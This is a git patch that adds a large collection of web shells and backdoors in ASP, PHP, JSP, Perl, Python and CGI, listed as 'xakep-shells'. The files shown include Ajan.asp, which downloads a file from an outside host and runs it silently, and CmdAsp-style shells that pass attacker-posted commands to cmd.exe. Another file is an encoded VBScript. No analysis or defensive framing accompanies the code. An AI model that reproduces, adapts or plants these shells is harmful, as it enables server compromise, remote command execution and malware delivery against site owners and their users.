From a4229cf9dcf6659e7fe403a32de2743451392081 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Sun, 18 May 2014 09:06:34 +0800
Subject: [PATCH] reupdate xakepshell

---
 xakep-shells/ASP/Ajan.asp.txt                 |   30 +
 xakep-shells/ASP/CMD.asp.txt                  |   53 +
 xakep-shells/ASP/CmdAsp.asp.txt               |   55 +
 xakep-shells/ASP/CyberSpy5.Asp.txt            |    2 +
 xakep-shells/ASP/EFSO_2.asp.txt               |   57 +
 xakep-shells/ASP/Elmali Seker.asp.txt         | 2324 +++++
 xakep-shells/ASP/NT Addy.asp.txt              | 1012 ++
 xakep-shells/ASP/Rader.asp.txt                |  116 +
 xakep-shells/ASP/Reader.asp.txt               |  116 +
 xakep-shells/ASP/RemExp.asp.txt               |  250 +
 xakep-shells/ASP/Server Variables.asp.txt     |   27 +
 xakep-shells/ASP/Tool.asp.txt                 |  792 ++
 xakep-shells/ASP/Zehir 4.asp.txt              | 1190 +++
 xakep-shells/ASP/aspydrv.asp.txt              |  828 ++
 xakep-shells/ASP/cmd-asp-5.1.asp.txt          |   41 +
 xakep-shells/ASP/elmaliseker.asp.txt          | 2324 +++++
 xakep-shells/ASP/indexer.asp.txt              |   74 +
 xakep-shells/ASP/kacak.asp.txt                |  899 ++
 xakep-shells/ASP/klasvayv.asp.txt             |  901 ++
 xakep-shells/ASP/ntdaddy.asp.txt              | 1012 ++
 xakep-shells/ASP/zehir4.asp.txt               | 1190 +++
 xakep-shells/CGI/WebShell.cgi.txt             |  869 ++
 xakep-shells/CGI/go-shell.cgi.txt             |   87 +
 xakep-shells/CGI/lurm_safemod_on.cgi.txt      |   94 +
 xakep-shells/CGI/telnet.cgi.txt               |  697 ++
 xakep-shells/JSP/Java Shell.js.txt            |  125 +
 xakep-shells/JSP/JspWebshell 1.2.jsp.txt      |  788 ++
 xakep-shells/JSP/cmdjsp.jsp.txt               |   32 +
 xakep-shells/JSP/jsp-reverse.jsp.txt          |   91 +
 xakep-shells/JSP/jspshall.jsp.txt             |  862 ++
 xakep-shells/PERL/Asmodeus v0.1.pl.txt        |  131 +
 xakep-shells/PERL/connectback2.pl.txt         |   61 +
 xakep-shells/PERL/perlbot.pl.txt              |  687 ++
 xakep-shells/PERL/shellbot.pl.txt             |  704 ++
 xakep-shells/PERL/telnet.pl.txt               |  692 ++
 xakep-shells/PERL/telnetd.pl.txt              |  462 +
 xakep-shells/PHP/1.txt                        | 8340 +++++++++++++++++
 xakep-shells/PHP/2008.php.php.txt             | 1990 ++++
 .../PHP/Ajax_PHP Command Shell.php.txt        |  646 ++
 xakep-shells/PHP/Antichat Shell v1.3.php.txt  |  180 +
 .../PHP/Antichat Socks5 Server.php.php.txt    |  485 +
 ...yildiz Tim  -AYT- Shell v 2.1 Biz.html.txt |  317 +
 xakep-shells/PHP/Casus15.php.php.txt          |  368 +
 xakep-shells/PHP/Crystal.php.txt              | 1127 +++
 xakep-shells/PHP/DTool Pro.php.txt            |  198 +
 ...e Shell 1.0 - Emperor Hacking Team.php.txt |  187 +
 xakep-shells/PHP/Dx.php.php.txt               | 2026 ++++
 xakep-shells/PHP/DxShell.php.php.txt          | 2031 ++++
 xakep-shells/PHP/Fatalshell.php.php.txt       |  283 +
 .../GFS web-shell ver 3.1.7 - PRiV8.php.txt   |  618 ++
 xakep-shells/PHP/KA_uShell.php.php.txt        |  229 +
 .../PHP/KAdot Universal Shell v0.1.6.html.txt |  229 +
 xakep-shells/PHP/LOTFREE.php.php.txt          |  133 +
 ... Command Execuriton Bypass Exploit.php.txt |   34 +
 ...roccan Spamers Ma-EditioN By GhOsT.php.txt |  182 +
 .../MySQL Web Interface Version 0.8.php.txt   | 1302 +++
 xakep-shells/PHP/Mysql interface v1.0.php.txt | 1166 +++
 ...LL v.0.5 alpha Lite Public Version.php.txt | 1480 +++
 .../PHP/NetworkFileManagerPHP.php.txt         | 5603 +++++++++++
 xakep-shells/PHP/Nshell (1).php.php.txt       |   66 +
 xakep-shells/PHP/PH Vayv.php.php.txt          |  597 ++
 xakep-shells/PHP/PHANTASMA.php.txt            |  634 ++
 .../PHP/PHP Backdoor Connect.pl.php.txt       |   61 +
 xakep-shells/PHP/PHP Shell.php.php.txt        | 1010 ++
 xakep-shells/PHP/PHPRemoteView.php.txt        | 2553 +++++
 xakep-shells/PHP/Private-i3lue.php.txt        | 1456 +++
 xakep-shells/PHP/Rem View.php.php.txt         | 2553 +++++
 xakep-shells/PHP/Russian.php.php.txt          |  229 +
 xakep-shells/PHP/STNC.php.php.txt             |  168 +
 ...hell -Safe Mod Bypass By Evilc0der.php.txt |  950 ++
 ...ode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt |   89 +
 ...- Vrsion 1.0.0 - priv8 4 My friend.php.txt |  378 +
 ...imShell 1.0 - Simorgh Security MGZ.php.txt |  180 +
 xakep-shells/PHP/Sincap.php.php.txt           |  124 +
 xakep-shells/PHP/SnIpEr_SA Shell.php.txt      | 2246 +++++
 xakep-shells/PHP/SpecialShell_99.php.php.txt  | 2822 ++++++
 xakep-shells/PHP/SsEs.php.php.txt             | 3309 +++++++
 xakep-shells/PHP/Test.php.php.txt             |   13 +
 xakep-shells/PHP/WinX Shell.html.txt          |  103 +
 xakep-shells/PHP/Worse Linux Shell.php.txt    |   69 +
 xakep-shells/PHP/aZRaiLPhp v1.0.php.txt       |  284 +
 xakep-shells/PHP/a_gedit.php.php.txt          |  693 ++
 xakep-shells/PHP/accept_language.php.txt      |    1 +
 xakep-shells/PHP/ak74shell.php.php.txt        |  640 ++
 xakep-shells/PHP/antichat.php.php.txt         |  366 +
 xakep-shells/PHP/backdoor1.php.txt            |  181 +
 xakep-shells/PHP/backdoorfr.php.txt           |  234 +
 xakep-shells/PHP/backup.php.php.txt           |   21 +
 xakep-shells/PHP/backupsql.php.php.txt        |  170 +
 xakep-shells/PHP/c100.php.txt                 | 3595 +++++++
 xakep-shells/PHP/c2007.php.php.txt            | 3299 +++++++
 xakep-shells/PHP/c99madshell_v2.0.php.php.txt |    7 +
 xakep-shells/PHP/c99madshell_v2.1.php.php.txt | 2517 +++++
 xakep-shells/PHP/c99php.txt                   | 2735 ++++++
 xakep-shells/PHP/c99shell_v1.0.php.php.txt    | 2900 ++++++
 xakep-shells/PHP/crystal.txt                  | 1127 +++
 xakep-shells/PHP/csh.php.php.txt              |  334 +
 xakep-shells/PHP/ctt_sh.php.php.txt           | 2927 ++++++
 xakep-shells/PHP/cyberlords_sql.php.php.txt   | 1722 ++++
 xakep-shells/PHP/cybershell.php.php.txt       | 1033 ++
 .../PHP/dC3 Security Crew Shell PRiV.php.txt  | 1273 +++
 xakep-shells/PHP/framer.zip                   |  Bin 0 -> 1494267 bytes
 xakep-shells/PHP/fuckphpshell.php.txt         |  322 +
 xakep-shells/PHP/gfs_sh.php.php.txt           | 1575 ++++
 .../PHP/h4ntu shell [powered by tsoi].txt     |   78 +
 xakep-shells/PHP/hidshell.php.php.txt         |    1 +
 xakep-shells/PHP/iMHaPFtp.php.php.txt         | 2061 ++++
 xakep-shells/PHP/img.php.php.txt              | 2106 +++++
 xakep-shells/PHP/ironshell.php.txt            |  588 ++
 xakep-shells/PHP/lamashell.php.txt            |   89 +
 xakep-shells/PHP/load_shell.php.php.txt       |  513 +
 xakep-shells/PHP/mailer3.php.php.txt          |  182 +
 xakep-shells/PHP/matamu.php.txt               |  146 +
 xakep-shells/PHP/myshell.php.php.txt          |  420 +
 xakep-shells/PHP/mysql.php.php.txt            | 1231 +++
 xakep-shells/PHP/mysql_shell.php.txt          | 1169 +++
 xakep-shells/PHP/mysql_tool.php.php.txt       | 1078 +++
 xakep-shells/PHP/network.php.php.txt          | 5603 +++++++++++
 xakep-shells/PHP/nfm.php.php.txt              | 3086 ++++++
 xakep-shells/PHP/ngh.php.php.txt              |  462 +
 xakep-shells/PHP/nixrem.php.php.txt           | 1772 ++++
 xakep-shells/PHP/nshell.php.php.txt           |  371 +
 xakep-shells/PHP/nst.php.php.txt              | 2136 +++++
 xakep-shells/PHP/nstview.php.php.txt          | 2136 +++++
 xakep-shells/PHP/pHpINJ.php.php.txt           |   37 +
 xakep-shells/PHP/php-backdoor.php.txt         |   71 +
 xakep-shells/PHP/php-include-w-shell.php.txt  | 1312 +++
 xakep-shells/PHP/phpbackdoor15.php.txt        |  133 +
 xakep-shells/PHP/phpjackal.php.txt            | 1413 +++
 xakep-shells/PHP/phpshell17.php.txt           |  177 +
 xakep-shells/PHP/phvayv.php.php.txt           |  124 +
 xakep-shells/PHP/phvayvv.php.php.txt          |  597 ++
 xakep-shells/PHP/predator.php.php.txt         | 1367 +++
 xakep-shells/PHP/pws.php.php.txt              |   35 +
 xakep-shells/PHP/r57 Shell.php.php.txt        | 1925 ++++
 xakep-shells/PHP/r57.php.php.txt              | 2206 +++++
 xakep-shells/PHP/r577.php.php.txt             | 1889 ++++
 xakep-shells/PHP/r57shell.php.php.txt         |  640 ++
 xakep-shells/PHP/rootshell.php.txt            |  349 +
 xakep-shells/PHP/rst_sql.php.php.txt          | 1694 ++++
 xakep-shells/PHP/ru24_post_sh.php.php.txt     |   23 +
 xakep-shells/PHP/s.php.php.txt                | 1887 ++++
 .../PHP/s72 Shell v1.1 Coding.html.txt        |  141 +
 xakep-shells/PHP/s72_shell.txt                |  141 +
 xakep-shells/PHP/sh.php.php.txt               |  644 ++
 xakep-shells/PHP/shankar.php.php.txt          |  748 ++
 xakep-shells/PHP/shell.php.php.txt            |  146 +
 xakep-shells/PHP/simple-backdoor.php.txt      |   17 +
 xakep-shells/PHP/simple_cmd.html.txt          |   18 +
 xakep-shells/PHP/small.php.php.txt            |   23 +
 xakep-shells/PHP/sniper_sa_shell.txt          | 2246 +++++
 xakep-shells/PHP/spy.php.php.txt              | 1889 ++++
 xakep-shells/PHP/sql.php.php.txt              | 1694 ++++
 xakep-shells/PHP/uploader.php.php.txt         |    9 +
 xakep-shells/PHP/w.php.php.txt                | 2653 ++++++
 xakep-shells/PHP/w3d.php.php.txt              |  128 +
 xakep-shells/PHP/w4k.php.php.txt              | 2830 ++++++
 xakep-shells/PHP/wacking.php.php.txt          | 2830 ++++++
 xakep-shells/PHP/webadmin.php.php.txt         | 2491 +++++
 xakep-shells/PHP/webshell.php.txt             |  268 +
 xakep-shells/PHP/wso.txt                      | 1523 +++
 xakep-shells/PHP/xinfo.php.php.txt            | 4820 ++++++++++
 xakep-shells/PHP/zacosmall.php.txt            |  501 +
 xakep-shells/PY/Phyton Shell.py.txt           |  121 +
 xakep-shells/PY/cgi-python.py.txt             |  124 +
 xakep-shells/PY/smtpd.py.txt                  |  549 ++
 xakep-shells/PY/wh_bindshell.py.txt           |   86 +
 xakep-shells/README.md                        |    1 +
 xakep-shells/others/mod_joomla_shell.PNG      |  Bin 0 -> 7021 bytes
 xakep-shells/others/mod_joomla_shell.zip      |  Bin 0 -> 34247 bytes
 .../others/tools/DefaceKeeper_0.2.php.txt     |   40 +
 171 files changed, 164183 insertions(+)
 create mode 100644 xakep-shells/ASP/Ajan.asp.txt
 create mode 100644 xakep-shells/ASP/CMD.asp.txt
 create mode 100644 xakep-shells/ASP/CmdAsp.asp.txt
 create mode 100644 xakep-shells/ASP/CyberSpy5.Asp.txt
 create mode 100644 xakep-shells/ASP/EFSO_2.asp.txt
 create mode 100644 xakep-shells/ASP/Elmali Seker.asp.txt
 create mode 100644 xakep-shells/ASP/NT Addy.asp.txt
 create mode 100644 xakep-shells/ASP/Rader.asp.txt
 create mode 100644 xakep-shells/ASP/Reader.asp.txt
 create mode 100644 xakep-shells/ASP/RemExp.asp.txt
 create mode 100644 xakep-shells/ASP/Server Variables.asp.txt
 create mode 100644 xakep-shells/ASP/Tool.asp.txt
 create mode 100644 xakep-shells/ASP/Zehir 4.asp.txt
 create mode 100644 xakep-shells/ASP/aspydrv.asp.txt
 create mode 100644 xakep-shells/ASP/cmd-asp-5.1.asp.txt
 create mode 100644 xakep-shells/ASP/elmaliseker.asp.txt
 create mode 100644 xakep-shells/ASP/indexer.asp.txt
 create mode 100644 xakep-shells/ASP/kacak.asp.txt
 create mode 100644 xakep-shells/ASP/klasvayv.asp.txt
 create mode 100644 xakep-shells/ASP/ntdaddy.asp.txt
 create mode 100644 xakep-shells/ASP/zehir4.asp.txt
 create mode 100644 xakep-shells/CGI/WebShell.cgi.txt
 create mode 100644 xakep-shells/CGI/go-shell.cgi.txt
 create mode 100644 xakep-shells/CGI/lurm_safemod_on.cgi.txt
 create mode 100644 xakep-shells/CGI/telnet.cgi.txt
 create mode 100644 xakep-shells/JSP/Java Shell.js.txt
 create mode 100644 xakep-shells/JSP/JspWebshell 1.2.jsp.txt
 create mode 100644 xakep-shells/JSP/cmdjsp.jsp.txt
 create mode 100644 xakep-shells/JSP/jsp-reverse.jsp.txt
 create mode 100644 xakep-shells/JSP/jspshall.jsp.txt
 create mode 100644 xakep-shells/PERL/Asmodeus v0.1.pl.txt
 create mode 100644 xakep-shells/PERL/connectback2.pl.txt
 create mode 100644 xakep-shells/PERL/perlbot.pl.txt
 create mode 100644 xakep-shells/PERL/shellbot.pl.txt
 create mode 100644 xakep-shells/PERL/telnet.pl.txt
 create mode 100644 xakep-shells/PERL/telnetd.pl.txt
 create mode 100644 xakep-shells/PHP/1.txt
 create mode 100644 xakep-shells/PHP/2008.php.php.txt
 create mode 100644 xakep-shells/PHP/Ajax_PHP Command Shell.php.txt
 create mode 100644 xakep-shells/PHP/Antichat Shell v1.3.php.txt
 create mode 100644 xakep-shells/PHP/Antichat Socks5 Server.php.php.txt
 create mode 100644 xakep-shells/PHP/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt
 create mode 100644 xakep-shells/PHP/Casus15.php.php.txt
 create mode 100644 xakep-shells/PHP/Crystal.php.txt
 create mode 100644 xakep-shells/PHP/DTool Pro.php.txt
 create mode 100644 xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt
 create mode 100644 xakep-shells/PHP/Dx.php.php.txt
 create mode 100644 xakep-shells/PHP/DxShell.php.php.txt
 create mode 100644 xakep-shells/PHP/Fatalshell.php.php.txt
 create mode 100644 xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt
 create mode 100644 xakep-shells/PHP/KA_uShell.php.php.txt
 create mode 100644 xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt
 create mode 100644 xakep-shells/PHP/LOTFREE.php.php.txt
 create mode 100644 xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt
 create mode 100644 xakep-shells/PHP/Moroccan Spamers Ma-EditioN By GhOsT.php.txt
 create mode 100644 xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt
 create mode 100644 xakep-shells/PHP/Mysql interface v1.0.php.txt
 create mode 100644 xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt
 create mode 100644 xakep-shells/PHP/NetworkFileManagerPHP.php.txt
 create mode 100644 xakep-shells/PHP/Nshell (1).php.php.txt
 create mode 100644 xakep-shells/PHP/PH Vayv.php.php.txt
 create mode 100644 xakep-shells/PHP/PHANTASMA.php.txt
 create mode 100644 xakep-shells/PHP/PHP Backdoor Connect.pl.php.txt
 create mode 100644 xakep-shells/PHP/PHP Shell.php.php.txt
 create mode 100644 xakep-shells/PHP/PHPRemoteView.php.txt
 create mode 100644 xakep-shells/PHP/Private-i3lue.php.txt
 create mode 100644 xakep-shells/PHP/Rem View.php.php.txt
 create mode 100644 xakep-shells/PHP/Russian.php.php.txt
 create mode 100644 xakep-shells/PHP/STNC.php.php.txt
 create mode 100644 xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt
 create mode 100644 xakep-shells/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt
 create mode 100644 xakep-shells/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt
 create mode 100644 xakep-shells/PHP/SimShell 1.0 - Simorgh Security MGZ.php.txt
 create mode 100644 xakep-shells/PHP/Sincap.php.php.txt
 create mode 100644 xakep-shells/PHP/SnIpEr_SA Shell.php.txt
 create mode 100644 xakep-shells/PHP/SpecialShell_99.php.php.txt
 create mode 100644 xakep-shells/PHP/SsEs.php.php.txt
 create mode 100644 xakep-shells/PHP/Test.php.php.txt
 create mode 100644 xakep-shells/PHP/WinX Shell.html.txt
 create mode 100644 xakep-shells/PHP/Worse Linux Shell.php.txt
 create mode 100644 xakep-shells/PHP/aZRaiLPhp v1.0.php.txt
 create mode 100644 xakep-shells/PHP/a_gedit.php.php.txt
 create mode 100644 xakep-shells/PHP/accept_language.php.txt
 create mode 100644 xakep-shells/PHP/ak74shell.php.php.txt
 create mode 100644 xakep-shells/PHP/antichat.php.php.txt
 create mode 100644 xakep-shells/PHP/backdoor1.php.txt
 create mode 100644 xakep-shells/PHP/backdoorfr.php.txt
 create mode 100644 xakep-shells/PHP/backup.php.php.txt
 create mode 100644 xakep-shells/PHP/backupsql.php.php.txt
 create mode 100644 xakep-shells/PHP/c100.php.txt
 create mode 100644 xakep-shells/PHP/c2007.php.php.txt
 create mode 100644 xakep-shells/PHP/c99madshell_v2.0.php.php.txt
 create mode 100644 xakep-shells/PHP/c99madshell_v2.1.php.php.txt
 create mode 100644 xakep-shells/PHP/c99php.txt
 create mode 100644 xakep-shells/PHP/c99shell_v1.0.php.php.txt
 create mode 100644 xakep-shells/PHP/crystal.txt
 create mode 100644 xakep-shells/PHP/csh.php.php.txt
 create mode 100644 xakep-shells/PHP/ctt_sh.php.php.txt
 create mode 100644 xakep-shells/PHP/cyberlords_sql.php.php.txt
 create mode 100644 xakep-shells/PHP/cybershell.php.php.txt
 create mode 100644 xakep-shells/PHP/dC3 Security Crew Shell PRiV.php.txt
 create mode 100644 xakep-shells/PHP/framer.zip
 create mode 100644 xakep-shells/PHP/fuckphpshell.php.txt
 create mode 100644 xakep-shells/PHP/gfs_sh.php.php.txt
 create mode 100644 xakep-shells/PHP/h4ntu shell [powered by tsoi].txt
 create mode 100644 xakep-shells/PHP/hidshell.php.php.txt
 create mode 100644 xakep-shells/PHP/iMHaPFtp.php.php.txt
 create mode 100644 xakep-shells/PHP/img.php.php.txt
 create mode 100644 xakep-shells/PHP/ironshell.php.txt
 create mode 100644 xakep-shells/PHP/lamashell.php.txt
 create mode 100644 xakep-shells/PHP/load_shell.php.php.txt
 create mode 100644 xakep-shells/PHP/mailer3.php.php.txt
 create mode 100644 xakep-shells/PHP/matamu.php.txt
 create mode 100644 xakep-shells/PHP/myshell.php.php.txt
 create mode 100644 xakep-shells/PHP/mysql.php.php.txt
 create mode 100644 xakep-shells/PHP/mysql_shell.php.txt
 create mode 100644 xakep-shells/PHP/mysql_tool.php.php.txt
 create mode 100644 xakep-shells/PHP/network.php.php.txt
 create mode 100644 xakep-shells/PHP/nfm.php.php.txt
 create mode 100644 xakep-shells/PHP/ngh.php.php.txt
 create mode 100644 xakep-shells/PHP/nixrem.php.php.txt
 create mode 100644 xakep-shells/PHP/nshell.php.php.txt
 create mode 100644 xakep-shells/PHP/nst.php.php.txt
 create mode 100644 xakep-shells/PHP/nstview.php.php.txt
 create mode 100644 xakep-shells/PHP/pHpINJ.php.php.txt
 create mode 100644 xakep-shells/PHP/php-backdoor.php.txt
 create mode 100644 xakep-shells/PHP/php-include-w-shell.php.txt
 create mode 100644 xakep-shells/PHP/phpbackdoor15.php.txt
 create mode 100644 xakep-shells/PHP/phpjackal.php.txt
 create mode 100644 xakep-shells/PHP/phpshell17.php.txt
 create mode 100644 xakep-shells/PHP/phvayv.php.php.txt
 create mode 100644 xakep-shells/PHP/phvayvv.php.php.txt
 create mode 100644 xakep-shells/PHP/predator.php.php.txt
 create mode 100644 xakep-shells/PHP/pws.php.php.txt
 create mode 100644 xakep-shells/PHP/r57 Shell.php.php.txt
 create mode 100644 xakep-shells/PHP/r57.php.php.txt
 create mode 100644 xakep-shells/PHP/r577.php.php.txt
 create mode 100644 xakep-shells/PHP/r57shell.php.php.txt
 create mode 100644 xakep-shells/PHP/rootshell.php.txt
 create mode 100644 xakep-shells/PHP/rst_sql.php.php.txt
 create mode 100644 xakep-shells/PHP/ru24_post_sh.php.php.txt
 create mode 100644 xakep-shells/PHP/s.php.php.txt
 create mode 100644 xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt
 create mode 100644 xakep-shells/PHP/s72_shell.txt
 create mode 100644 xakep-shells/PHP/sh.php.php.txt
 create mode 100644 xakep-shells/PHP/shankar.php.php.txt
 create mode 100644 xakep-shells/PHP/shell.php.php.txt
 create mode 100644 xakep-shells/PHP/simple-backdoor.php.txt
 create mode 100644 xakep-shells/PHP/simple_cmd.html.txt
 create mode 100644 xakep-shells/PHP/small.php.php.txt
 create mode 100644 xakep-shells/PHP/sniper_sa_shell.txt
 create mode 100644 xakep-shells/PHP/spy.php.php.txt
 create mode 100644 xakep-shells/PHP/sql.php.php.txt
 create mode 100644 xakep-shells/PHP/uploader.php.php.txt
 create mode 100644 xakep-shells/PHP/w.php.php.txt
 create mode 100644 xakep-shells/PHP/w3d.php.php.txt
 create mode 100644 xakep-shells/PHP/w4k.php.php.txt
 create mode 100644 xakep-shells/PHP/wacking.php.php.txt
 create mode 100644 xakep-shells/PHP/webadmin.php.php.txt
 create mode 100644 xakep-shells/PHP/webshell.php.txt
 create mode 100644 xakep-shells/PHP/wso.txt
 create mode 100644 xakep-shells/PHP/xinfo.php.php.txt
 create mode 100644 xakep-shells/PHP/zacosmall.php.txt
 create mode 100644 xakep-shells/PY/Phyton Shell.py.txt
 create mode 100644 xakep-shells/PY/cgi-python.py.txt
 create mode 100644 xakep-shells/PY/smtpd.py.txt
 create mode 100644 xakep-shells/PY/wh_bindshell.py.txt
 create mode 100644 xakep-shells/README.md
 create mode 100644 xakep-shells/others/mod_joomla_shell.PNG
 create mode 100644 xakep-shells/others/mod_joomla_shell.zip
 create mode 100644 xakep-shells/others/tools/DefaceKeeper_0.2.php.txt

diff --git a/xakep-shells/ASP/Ajan.asp.txt b/xakep-shells/ASP/Ajan.asp.txt
new file mode 100644
index 0000000..e4ce66e
--- /dev/null
+++ b/xakep-shells/ASP/Ajan.asp.txt
@@ -0,0 +1,30 @@
+<SCRIPT LANGUAGE="VBScript">
+<%
+Set entrika = CreateObject("Scripting.FileSystemObject")
+Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
+entrika.write "Dim BinaryData" & vbcrlf
+entrika.write "Dim xml" & vbcrlf
+entrika.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
+entrika.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
+entrika.write "xml.Send" & vbcrlf
+entrika.write "BinaryData = xml.ResponsebOdy" & vbcrlf
+entrika.write "Const adTypeBinary = 1" & vbcrlf
+entrika.write "Const adSaveCreateOverWrite = 2" & vbcrlf
+entrika.write "Dim BinaryStream" & vbcrlf
+entrika.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
+entrika.write "BinaryStream.Type = adTypeBinary" & vbcrlf
+entrika.write "BinaryStream.Open" & vbcrlf
+entrika.write "BinaryStream.Write BinaryData" & vbcrlf
+entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
+entrika.write "Dim WshShell"  & vbcrlf
+entrika.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
+entrika.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
+entrika.close
+Set entrika = Nothing
+Set entrika = Nothing
+
+Dim WshShell
+Set WshShell = CreateObject("WScript.Shell")
+WshShell.Run "c:\net.vbs", 0, false
+%>
+ </SCRIPT>
\ No newline at end of file
diff --git a/xakep-shells/ASP/CMD.asp.txt b/xakep-shells/ASP/CMD.asp.txt
new file mode 100644
index 0000000..479db5d
--- /dev/null
+++ b/xakep-shells/ASP/CMD.asp.txt
@@ -0,0 +1,53 @@
+<%@ Language=VBScript %>
+<%
+  ' --------------------o0o--------------------
+  ' File: CmdAsp.asp
+  ' Author: Maceo <maceo @ dogmile.com>
+  ' Release: 2000-12-01
+  ' OS: Windows 2000, 4.0 NT
+  ' -------------------------------------------
+
+  Dim oScript
+  Dim oScriptNet
+  Dim oFileSys, oFile
+  Dim szCMD, szTempFile
+
+  On Error Resume Next
+
+  ' -- create the COM objects that we will be using -- '
+  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+  ' -- check for a command that we have posted -- '
+  szCMD = Request.Form(".CMD")
+  If (szCMD <> "") Then
+
+    ' -- Use a poor man's pipe ... a temp file -- '
+    szTempFile = "C:\" & oFileSys.GetTempName( )
+    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+  End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    ' -- Read the output from our command and remove the temp file -- '
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
diff --git a/xakep-shells/ASP/CmdAsp.asp.txt b/xakep-shells/ASP/CmdAsp.asp.txt
new file mode 100644
index 0000000..e524745
--- /dev/null
+++ b/xakep-shells/ASP/CmdAsp.asp.txt
@@ -0,0 +1,55 @@
+<++ CmdAsp.asp ++>
+<%@ Language=VBScript %>
+<%
+' --------------------o0o--------------------
+' File: CmdAsp.asp
+' Author: Maceo <maceo @ dogmile.com>
+' Release: 2000-12-01
+' OS: Windows 2000, 4.0 NT
+' -------------------------------------------
+
+Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+
+On Error Resume Next
+
+' -- create the COM objects that we will be using -- '
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+' -- check for a command that we have posted -- '
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+
+' -- Use a poor man's pipe ... a temp file -- '
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+If (IsObject(oFile)) Then
+' -- Read the output from our command and remove the temp file -- '
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If
+%>
+</BODY>
+</HTML>
+<-- CmdAsp.asp -->
diff --git a/xakep-shells/ASP/CyberSpy5.Asp.txt b/xakep-shells/ASP/CyberSpy5.Asp.txt
new file mode 100644
index 0000000..bcf5138
--- /dev/null
+++ b/xakep-shells/ASP/CyberSpy5.Asp.txt
@@ -0,0 +1,2 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^FkQBAA==@#@&rU,2MDWMP"n/!:nPg+aO@#@&?.\DRU^.kaY:kh+6;DP~',{ Z!@#@&@#@&frh,1n/	nw?6@#@&"+/aW	d+c.kD+~E@!/YHs+@*PA}9ePPPUZ]rJJ~b]O~)?AO/6drIl~[&$&~f~i~UZ"rSdAz]OzI]rqO/6drI=~a2&swffi,8,@!&/Oz^+@*J@#@&I/2G	/+ 	MkO+,E@!4G9X,4o1W^GD{!T!Z!T~D+6DxB[!!woT!EP^kU3xv[!TswT!EPCsbx3xv[!TswTZB~7Vbx3{B[T!wsT!EPOGa:lMLk	'!@*E@#@&@#@&`w[lOn;W[+,xPrtOOa)z&ASh ZH8DRqlMDkKDc6DTz/X(+.jaX*c)/agu-kE@#@&@#@&BRORR ORO RO O)UKxkh~`wsWm[;VCk/,?YmDD~ZKNnO ORR OO RO OO RRO O ORORR @#@&Z^C/kPor^+j2sKl[+M@#@&dK!4^km,PwrV/@#@&in.r7lY~sKD:Asn:mxhD#@#@&7hDr\mO+,?;8,ZVCdk{(xbOblsby`#@#@&i7?Y~sbVnd,'PUnD7+Dc/.+mYr8Ln^D`E?1.kaYrUTRfr^DkGxm.HJb@#@&id?Y,oWM:3V:CUhD.,xPU+D7n.R;DlO+68N+^YvE?1Dr2DkxL Gk^YbG	l.HJ*@#@&i2	[PUE8@#@&dK.b\lDnPUE4,/slk/|KnDhr	lO+vb@#@&d7rwPqd6(LnmDcwks/*PK4+	@#@&id7sbVndcI+sG\bV^cb@#@&didj+O~wks+k~',1GO4kxL@#@&d72	[,ko@#@&idkwP&dr(LnmD`oGM:2^n:mxnM#bP:tx@#@&77isGDs3V:CUhD. ]:G\)^Vc*@#@&ddi?OPwW.:AVnhmxnM#P{P1KO4k	